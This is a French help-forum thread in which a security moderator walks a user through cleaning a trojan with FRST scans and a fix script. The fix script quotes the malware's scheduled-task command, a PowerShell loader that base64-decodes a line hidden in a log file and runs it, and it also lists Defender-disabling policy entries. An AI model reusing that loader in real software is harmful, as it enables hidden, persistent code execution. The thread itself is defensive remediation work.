Software.log1 est infecte
Résolu/Fermé
kodel7
Messages postés
24
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
29 novembre 2023
-
29 juin 2022 à 20:25
bazfile Messages postés 53650 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 22 avril 2024 - 29 juin 2022 à 23:04
bazfile Messages postés 53650 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 22 avril 2024 - 29 juin 2022 à 23:04
A voir également:
- Software.log1 est infecte
- L'ordinateur de simon a été infecté par un virus répertorié récemment. son anti-virus ne l'a pas détecté. qu'a-t-il pu se passer ? - Forum Jeux vidéo
- L'ordinateur de samantha a été infecté par un virus répertorié récemment. son anti-virus ne l'a pas détecté. qu'a-t-il pu se passer ? - Forum Antivirus
- Infecte par un virus - Forum Virus
- Simon - Forum Cinéma / Télé
- L'ordinateur d'arthur a été infecté par un virus répertorié récemment. son anti-virus ne l'a pas détecté. qu'a-t-il pu se passer ? ✓ - Forum Virus
3 réponses
bazfile
Messages postés
53650
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 avril 2024
18 465
29 juin 2022 à 20:27
29 juin 2022 à 20:27
Bonjour,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
Attention, attendre que les messages disant que l'analyse est terminée s'affichent
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
kodel7
Messages postés
24
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
29 novembre 2023
Modifié le 29 juin 2022 à 21:29
Modifié le 29 juin 2022 à 21:29
bazfile
Messages postés
53650
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 avril 2024
18 465
29 juin 2022 à 21:31
29 juin 2022 à 21:31
Une fois ton pc désinfecté il faudra changer tous tes mots de passe en ligne.
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
Task: {6C290D84-5FF2-4896-8463-779804BF91F5} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a=Get-Content "C:\Windows\logs\system-logs.txt" | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction
GroupPolicy: Restriction ?
Policies: C:\ProgramData\NTUSER.pol: Restriction
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction
Task: {68063257-AFAD-4FD9-A54E-BFDF91840EE5} - System32\Tasks\Service\Diagnostic => C:\Users\LEGION\AppData\Roaming\ServiceGet\Nartez.exe -> "C:\Users\LEGION\AppData\Roaming\ServiceGet\Nartez.dat"
HKU\S-1-5-21-3210557229-2298905555-4232158819-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (Pas de fichier)
HKU\S-1-5-21-3210557229-2298905555-4232158819-1001\...\Run: [OSDownloaderUpdate] => "D:\OSDownloader\OSDownloaderUpdate.exe" "sleep" (Pas de fichier)
HKU\S-1-5-21-3210557229-2298905555-4232158819-1001\...\Run: [OSDownloader] => "D:\OSDownloader\OSDownloader.exe" AutoStart (Pas de fichier)
Task: {1C8F25A7-9D74-4441-8028-7C3D8C4300B2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3210557229-2298905555-4232158819-1001Core => C:\Users\LEGION\AppData\Local\Google\Update\GoogleUpdate.exe /c (Pas de fichier)
Task: {BDCC6BEA-B78F-42F2-B595-BEEC4B3704AF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3210557229-2298905555-4232158819-1001UA => C:\Users\LEGION\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler (Pas de fichier)
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
CustomCLSID: HKU\S-1-5-21-3210557229-2298905555-4232158819-1001_Classes\CLSID\{345D3165-3889-4694-AB75-A91A27B217E8}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2022\acad.exe => Pas de fichier
CustomCLSID: HKU\S-1-5-21-3210557229-2298905555-4232158819-1001_Classes\CLSID\{8B4929F8-076F-4AEC-AFEE-8928747B7AE3}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2022\acad.exe /Automation => Pas de fichier
CustomCLSID: HKU\S-1-5-21-3210557229-2298905555-4232158819-1001_Classes\CLSID\{AA46BA8A-9825-40FD-8493-0BA3C4D5CEB5}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2022\acad.exe /Automation => Pas de fichier
AlternateDataStreams: C:\WINDOWS\system32\9EarsSurroundSound.dll:97D88723C8 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk:B96E9B8455 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth Pro.lnk:D4B8FFC6DE [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Safe Connect.lnk:25005D1B15 [3314]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote.lnk:60EC9648C0 [3314]
FirewallRules: [{FAC297E8-F9F6-4E52-B185-9EDF1850140A}] => (Allow) C:\Users\LEGION\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [{568BDB65-9616-455B-9034-D1A3D61139E5}] => (Allow) C:\Users\LEGION\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
C:\Users\LEGION\AppData\Roaming\ServiceGet
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT
.
kodel7
Messages postés
24
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
29 novembre 2023
>
bazfile
Messages postés
53650
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 avril 2024
Modifié le 29 juin 2022 à 21:42
Modifié le 29 juin 2022 à 21:42
avant j'ai juste 2 petite question , avant merci pour ton aide et en quoi le frst est diffèrent des autres antivirus ? et pour celui qui se situe dans le systeme32 t'es sur que le "corrige"est une bonne idée ?
bazfile
Messages postés
53650
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 avril 2024
18 465
>
kodel7
Messages postés
24
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
29 novembre 2023
Modifié le 29 juin 2022 à 21:58
Modifié le 29 juin 2022 à 21:58
Le script ne supprime pas le fichier qui est dans le system32, il supprime la tâche planifiée et surtout les commandes powershell vérolées qu'elle contient.
kodel7
Messages postés
24
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
29 novembre 2023
Modifié le 29 juin 2022 à 22:11
Modifié le 29 juin 2022 à 22:11
https://www.cjoint.com/c/LFDukzIzpOz
merci encore
merci encore
bazfile
Messages postés
53650
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 avril 2024
18 465
29 juin 2022 à 22:12
29 juin 2022 à 22:12
Le fixlog est OK, ton problème est-il toujours présent ?
kodel7
Messages postés
24
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
29 novembre 2023
>
bazfile
Messages postés
53650
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 avril 2024
29 juin 2022 à 22:24
29 juin 2022 à 22:24
grâce a toi non , je ne pourrai jamais te remercier assez , et donc maintenait je dois changer tout mes mots de passe enligne ? c'était un spyware ?
bazfile
Messages postés
53650
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 avril 2024
18 465
>
kodel7
Messages postés
24
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
29 novembre 2023
29 juin 2022 à 22:34
29 juin 2022 à 22:34
Non beaucoup plus grave qu'un simple spyware, pour un spyware je ne t'aurais pas demandé de changer tes mots de passe en ligne, c'était un trojan.
Si pour toi tout est OK tu peux désinstaller FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.
Si pour toi tout est OK tu peux désinstaller FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.
kodel7
Messages postés
24
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
29 novembre 2023
>
bazfile
Messages postés
53650
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 avril 2024
29 juin 2022 à 22:49
29 juin 2022 à 22:49
d'accord merci beaucoup tu me sauve encore XD
bazfile
Messages postés
53650
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
22 avril 2024
18 465
>
kodel7
Messages postés
24
Date d'inscription
samedi 30 mai 2020
Statut
Membre
Dernière intervention
29 novembre 2023
29 juin 2022 à 23:04
29 juin 2022 à 23:04
De rien.
@+ sur CCM.
@+ sur CCM.
